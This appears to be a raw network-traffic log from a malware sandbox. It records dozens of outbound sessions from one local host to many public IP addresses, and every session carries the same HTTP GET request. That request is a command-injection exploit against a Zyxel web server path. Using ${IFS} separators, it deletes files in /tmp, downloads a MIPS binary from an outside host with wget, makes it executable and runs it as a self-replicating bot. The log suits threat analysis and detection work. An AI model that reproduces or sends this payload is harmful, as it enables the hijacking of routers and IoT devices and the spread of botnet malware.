                                    Jan 13, 2024 19:02:22.918442965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1702192.168.2.1350870109.112.196.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918484926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1703192.168.2.1336268190.10.179.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918530941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1704192.168.2.1345872210.0.208.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918598890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1705192.168.2.135579687.139.185.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918661118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1706192.168.2.1351340113.180.111.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918719053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1707192.168.2.1344440180.186.178.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918776035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1708192.168.2.134929459.93.206.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918838978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1709192.168.2.1340044150.185.184.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918912888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1710192.168.2.1342752200.115.173.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918962955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1711192.168.2.1351818109.46.43.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919014931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1712192.168.2.135742660.151.151.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919059992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1713192.168.2.133311071.117.68.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919111013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1714192.168.2.1343486150.19.102.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919167995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1715192.168.2.13577969.2.229.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919212103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1716192.168.2.134774223.101.1.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919260979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1717192.168.2.136037287.208.16.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919337034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1718192.168.2.1352140133.129.4.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919392109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1719192.168.2.1338206207.11.71.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919429064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1720192.168.2.1347238166.16.189.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919502020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1721192.168.2.134475812.47.251.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919536114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1722192.168.2.1346470150.223.43.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919583082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1723192.168.2.1337666195.163.172.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919621944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1724192.168.2.1343796151.95.145.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919668913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1725192.168.2.1350808219.53.136.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919708014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1726192.168.2.135430895.24.152.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919759035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1727192.168.2.135050024.78.22.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919847965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1728192.168.2.1355524144.207.153.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919876099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1729192.168.2.135232625.245.199.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919925928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1730192.168.2.1354166169.112.111.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.919959068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1731192.168.2.135273645.255.246.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920021057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1732192.168.2.135214261.22.122.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920094013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1733192.168.2.135046684.40.95.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920137882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1734192.168.2.1349124168.19.124.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920207977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1735192.168.2.1337200154.237.79.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920277119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1736192.168.2.1339124187.55.89.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920316935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1737192.168.2.134318697.123.189.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920371056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1738192.168.2.135821474.177.186.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920439005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1739192.168.2.1350754201.220.227.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920485973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1740192.168.2.134497074.143.214.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920526981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1741192.168.2.133526220.212.172.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920586109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1742192.168.2.1358486142.34.147.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920641899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1743192.168.2.1360084100.8.37.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920660973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1744192.168.2.1356296213.187.185.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920731068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1745192.168.2.1346224175.145.73.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920794964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1746192.168.2.1333148121.5.224.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920833111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1747192.168.2.133619491.211.133.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920880079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1748192.168.2.135543242.244.82.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920914888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1749192.168.2.1356422169.237.73.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920948029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1750192.168.2.1348576129.14.173.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.920975924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1751192.168.2.1351584173.50.86.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921011925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1752192.168.2.134478672.81.173.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921060085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1753192.168.2.134072274.24.147.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921116114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1754192.168.2.1358402205.5.126.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921190977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1755192.168.2.1349000160.156.58.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921232939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1756192.168.2.1350558169.23.37.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921277046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1757192.168.2.1343656190.62.222.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921324968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1758192.168.2.134331462.254.206.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921376944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1759192.168.2.134847072.89.189.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921413898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1760192.168.2.1340000209.35.176.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921446085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1761192.168.2.1355312173.15.201.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921545982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1762192.168.2.1346968153.43.30.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921570063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1763192.168.2.133425493.117.15.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921632051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1764192.168.2.1359240140.174.245.92443
                                    TimestampBytes transferredDirectionData
